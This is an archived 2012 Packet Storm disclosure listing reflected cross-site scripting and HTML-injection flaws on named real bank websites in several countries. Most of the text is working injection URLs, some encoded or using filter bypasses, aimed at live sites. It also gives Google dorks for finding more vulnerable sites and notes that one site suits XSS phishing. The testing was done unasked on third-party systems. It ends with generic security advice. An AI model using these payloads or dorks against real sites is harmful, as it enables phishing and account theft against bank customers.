Various Banks Cross Site Scripting

2012-03-21T00:00:00
ID PACKETSTORM:111068
Type packetstorm
Reporter Sony
Modified 2012-03-21T00:00:00

Description

                                        
                                            `# Title: Some bank websites that suffer from Cross-site scripting  
vulnerabilities.  
# Author: Sony and Flexxpoint  
# Data: 21.03.2012  
# Sony Blog: http://st2tea.blogspot.com  
# Flexxpoint Blog : http://flexxpoint.blogspot.com/  
# Site: http://insecurity.ro  
  
  
  
We staged an experiment out of interest. We looked through several randomly  
selected websites of Worlds banks to check them for vulnerabilities. This  
was done rather quick even without any specialized software. The results  
were not surprising. We will demonstrate different bugs of the same type.  
  
Demo:  
  
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://insecurity.ro  
  
Good redirect in bitrix:  
  
inurl:bitrix/rk.php  
  
  
http://www.citizensbank.com/  
(U.S.)  
  
Simple (in the Search)  
  
http://www.citizensbank.com/search/?query=Secure%20Plan%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E  
  
http://1.bp.blogspot.com/-VXe7DI33JZY/T2oaFz3lNsI/AAAAAAAAAxg/SI3qNHuHhTM/s1600/citiz.JPG  
  
  
https://www.wellsfargo.com/  
(U.S.)  
  
http://codepad.org/inXkWxYw  
  
http://2.bp.blogspot.com/-4D9eFxw2lEo/T2olrOdp20I/AAAAAAAAAyQ/I3tXgGCwy18/s1600/well.JPG  
  
  
http://www.eximb.com  
(Ukraine)  
  
http://www.eximb.com/rus/personal/everyday/internet_banking/?f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://4.bp.blogspot.com/-Tr_xxEc7qb8/T2okk8UQDKI/AAAAAAAAAx4/18ytDW1-1vE/s1600/ukr.JPG  
  
  
http://procreditbank.bg/main/bg/index.php  
(Bulgaria)  
  
https://probanking.procreditbank.bg/regist/default.asp?password2=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E  
  
http://2.bp.blogspot.com/-rcnxgpMMEWI/T2ok6TTg1MI/AAAAAAAAAyE/UohK8mVuWv8/s1600/bg.JPG  
  
http://www.vtb24.ru  
(Russia)  
  
http://www.vtb24.ru/news/Pages/nizhnij-tagil.aspx?year=2012&category=%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E  
  
http://4.bp.blogspot.com/-9y23IS0u0eE/T2ooHfayKVI/AAAAAAAAAyc/ZnG7d5DkYxQ/s1600/vtb24.JPG  
  
http://www.homecredit.ru/  
(Russia)  
  
https://online.homecredit.ru/ChatApp/login.jsp  
  
or..  
  
https://online.homecredit.ru/ChatApp/Chat/HtmlChatFrameSet.jsp  
  
We have a html code injection in the chat.  
  
http://3.bp.blogspot.com/-g6wV1CxgQ8s/T2oot2nrWrI/AAAAAAAAAyo/tzv1c88OOI4/s1600/%25D1%2585%25D0%25BE%25D1%2583%25D0%25BC%25D0%25BA%25D1%2580%25D0%25B5%25D0%25B4%25D0%25B8%25D1%2582.JPG  
  
http://www.mastercardpremium.ru  
(Russia, but not a official site, but good for xss phishing attack)  
  
Simple.  
  
http://www.mastercardpremium.ru/search?phrase=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E  
  
http://2.bp.blogspot.com/-GNO4Jr9lqXI/T2optstPVbI/AAAAAAAAAy0/YlmZ6-244Bs/s1600/master.JPG  
  
  
http://www.raiffeisen.ch/web/home_de  
(Switzerland)  
  
http://www.raiffeisen.ch/raiffeisen/internet/rb0027.nsf/fAskForDeletionFile?ReadForm&File=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E  
  
http://4.bp.blogspot.com/-OhU-4_Ozyfo/T2pLUMNrBjI/AAAAAAAAAzw/hzjXJrKfkoA/s1600/1a.JPG  
  
http://boerse.raiffeisen.ch/raiffeisen2/listings/intraday.jsp?listing=998089,4,1&name=SM%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E  
  
http://2.bp.blogspot.com/-xl85-SjlrgM/T2pLafEU3qI/AAAAAAAAAz8/mgJ-eVLojZA/s1600/2a.JPG  
  
  
http://www.uwcfs.com/  
(Czech Republic)  
  
XSS in Chat. And we can see:  
  
http://www1.migbank.com/  
  
https://www.msufcu.org/  
  
Google Dorks: inurl:/phplive/message_box.php?theme=  
  
1 bug = a lot of web sites..  
  
https://secure.moneypolo.cz/phplive/message_box.php?theme=&l=admin&x=1&deptid=1%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E  
  
http://3.bp.blogspot.com/-6Jj21EVa3KI/T2o_UdIZT_I/AAAAAAAAAzY/XaKAhlnwHXw/s1600/internetbank.JPG  
  
  
http://www.bcb.gob.bo/index.php  
(Bolivia)  
(but work only on old IE versions,and IE related browsers-Maxton,Green..etc)  
  
http://www.bcb.gob.bo/index.php?q=%22%20stYle=%22x:expre/**/ssion%28alert%28/XSS/.source%29%29%20&combos1_1=1&combos1_2=1&combos1_3=1&combos1_4=1&combos1_5=1&combos1_6=1&combos1_7=1&combos1_8=1&combos1_9=1&subcateg1=1&Submit=Buscar  
  
http://img29.imageshack.us/img29/4543/screenshot2232012.png  
  
  
http://2.bp.blogspot.com/-usdHXZgWB3k/T2pCJXRUtVI/AAAAAAAAAzk/NQbnfe3RwRw/s1600/bolivia.JPG  
  
  
We would like to add a few words about security. There's no need to panic,  
perfect security just isn't possible, though we should try to come as close  
as possible. We would like to give a couple of advices for these banks.  
They should certainly pay more attention to their IT personnel's competence  
and discipline, spend their money not only on market research, but also on  
penetration testing, organize penetration testers' contests like Google and  
Facebook do or possible have their own staff of penetration testers. The  
bank personnel should be tested for their vulnerability to social  
engineering. These are just the basics.  
`